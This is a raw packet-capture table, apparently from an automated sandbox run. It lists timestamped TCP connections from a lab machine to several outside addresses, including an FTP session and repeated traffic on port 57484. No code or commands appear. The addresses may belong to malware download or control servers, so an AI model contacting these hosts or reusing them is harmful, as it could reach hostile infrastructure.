                                                                                                Oct 22, 2024 06:17:17.471577883 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.471640110 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.584435940 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.584474087 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.584595919 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.584654093 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.584654093 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.584654093 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.584721088 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.584769011 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.584810972 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.698599100 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.698626041 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.698792934 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.698792934 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.698858976 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.698920012 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.700161934 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.700335026 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.739522934 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.739543915 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.739732981 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.739732981 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.739803076 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.739862919 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.823100090 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.823128939 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.823311090 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.823333025 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.823527098 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.936698914 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.936728954 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.936904907 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.936904907 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.936927080 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.937139988 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.941893101 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.941977024 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:17.941996098 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:17.942171097 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.190768957 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.190783024 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.190965891 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.191006899 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.191076040 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.191128969 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.191128969 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.198561907 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.198581934 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.198755026 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.198755026 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.198818922 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.198877096 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.204179049 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.204255104 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.204345942 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.204345942 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.204408884 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.204463959 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.210432053 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.210453987 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.210613012 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.210613012 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.210676908 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.210736036 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.212357998 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.212537050 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.294284105 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.294469118 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.294471025 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.294548988 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.294589996 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.298141003 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.298218966 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.298309088 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.298309088 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.298373938 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.379352093 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.379379988 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.379542112 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.379543066 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.379610062 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.416493893 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.416673899 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.416685104 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.416764975 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.416812897 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.457410097 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.457433939 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.457588911 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.457593918 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.457593918 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.457665920 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.457727909 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.499902010 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.500078917 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.535693884 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.535712957 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.535888910 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.535897970 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.535969019 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.536010981 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.536899090 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.541810036 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.541922092 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.541981936 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.542069912 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.653847933 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.653876066 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.654059887 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.654059887 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.654125929 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.654743910 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.658477068 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.658674002 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.658714056 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.658801079 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.658845901 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.659316063 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.738749027 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.738769054 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.738945007 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.738945007 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.739008904 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.739067078 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.773737907 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.773828983 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.773888111 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.773973942 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.779427052 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.779496908 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.779501915 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.779546976 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.779586077 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.779687881 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.860460043 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.860527992 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.860661030 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.860661983 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.860726118 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.860850096 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.861344099 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.896249056 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.896447897 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.896450043 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.896541119 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.896584034 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.896989107 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.936150074 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.936211109 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.936347008 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.936347008 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:18.936410904 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:18.936485052 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.012818098 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.012885094 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.013041973 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.013042927 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.013107061 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.013715029 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.019357920 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.019561052 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.019562006 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.019627094 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.019678116 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.019900084 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.097642899 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.097836971 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.097840071 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.097918987 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.097959995 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.132112980 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.132177114 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.132318020 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.132318020 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.132385969 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.134046078 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.134253025 CEST44349735188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.134262085 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.134262085 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.134341955 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.134886980 CEST49735443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:19.147663116 CEST4973021192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:19.153363943 CEST2149730191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.419469118 CEST2149730191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.419958115 CEST4973860710192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:19.425774097 CEST6071049738191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.425847054 CEST4973860710192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:19.425901890 CEST4973021192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:19.431468964 CEST2149730191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.698240995 CEST2149730191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:19.908349037 CEST4973021192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:20.181598902 CEST6071049738191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:20.183093071 CEST2149730191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:20.318909883 CEST6071049738191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:20.319004059 CEST4973860710192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:20.319053888 CEST4973860710192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:20.320177078 CEST49741443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:20.320274115 CEST44349741188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:20.320353031 CEST49741443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:20.320602894 CEST49741443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:20.320627928 CEST44349741188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:20.324516058 CEST6071049738191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:20.408165932 CEST4973021192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:20.945745945 CEST44349741188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:20.947101116 CEST49741443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:20.947179079 CEST44349741188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:21.239619017 CEST44349741188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:21.239737034 CEST44349741188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:21.239835978 CEST49741443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:21.240194082 CEST49741443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:21.551243067 CEST4973021192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:23.265501976 CEST49744443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:23.265597105 CEST44349744104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:23.265686035 CEST49744443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:23.267858982 CEST49744443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:23.267895937 CEST44349744104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:24.122273922 CEST44349744104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:24.122365952 CEST49744443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:24.126445055 CEST49744443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:24.126475096 CEST44349744104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:24.126893044 CEST44349744104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:24.136034012 CEST49744443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:24.179371119 CEST44349744104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:24.976671934 CEST44349744104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:24.976778984 CEST44349744104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:24.977181911 CEST49744443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:24.977674007 CEST49744443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:25.798657894 CEST4974557484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:25.804131985 CEST574844974543.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:25.804220915 CEST4974557484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:25.805213928 CEST4974557484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:25.810525894 CEST574844974543.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:26.498104095 CEST49746443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:26.498209000 CEST44349746104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:26.498519897 CEST49746443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:26.500248909 CEST49746443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:26.500286102 CEST44349746104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:27.123311043 CEST44349746104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:27.124716043 CEST49746443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:27.124716043 CEST49746443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:27.124761105 CEST44349746104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:27.125596046 CEST44349746104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:27.132805109 CEST49746443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:27.179328918 CEST44349746104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:27.226085901 CEST574844974543.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:27.230716944 CEST4974557484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:27.237375975 CEST574844974543.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:27.278879881 CEST44349746104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:27.279081106 CEST44349746104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:27.282782078 CEST49746443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:27.286720991 CEST49746443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:27.635242939 CEST574844974543.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:27.736314058 CEST4974557484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:27.752018929 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:27.757813931 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:27.758018017 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:27.758018017 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:27.763478994 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:28.355971098 CEST4974880192.168.2.4178.237.33.50
                                                                                                Oct 22, 2024 06:17:28.361743927 CEST8049748178.237.33.50192.168.2.4
                                                                                                Oct 22, 2024 06:17:28.361846924 CEST4974880192.168.2.4178.237.33.50
                                                                                                Oct 22, 2024 06:17:28.361958027 CEST4974880192.168.2.4178.237.33.50
                                                                                                Oct 22, 2024 06:17:28.367377043 CEST8049748178.237.33.50192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.179641962 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.179697990 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.179743052 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:29.183073997 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.183171034 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.183202982 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.183228016 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:29.183768988 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.183813095 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.183818102 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:29.198045015 CEST8049748178.237.33.50192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.198113918 CEST4974880192.168.2.4178.237.33.50
                                                                                                Oct 22, 2024 06:17:29.208185911 CEST4974557484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:29.214226961 CEST574844974543.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.298804998 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:29.589320898 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.589375973 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.589416981 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.589430094 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:29.589498997 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.589597940 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:29.592576981 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.592669964 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.592701912 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.592721939 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:29.593261003 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.593305111 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.593332052 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:29.593458891 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.593489885 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.593508959 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:29.594137907 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.594187975 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:29.594189882 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.594227076 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.594343901 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:29.998756886 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.998820066 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.998853922 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.999375105 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:29.999422073 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.999475002 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.999521017 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:29.999617100 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.999648094 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:29.999660015 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.001715899 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.001806974 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.001844883 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.001863003 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.001887083 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.002640963 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.002696037 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.002974033 CEST574844974743.226.229.232192.168.2.4
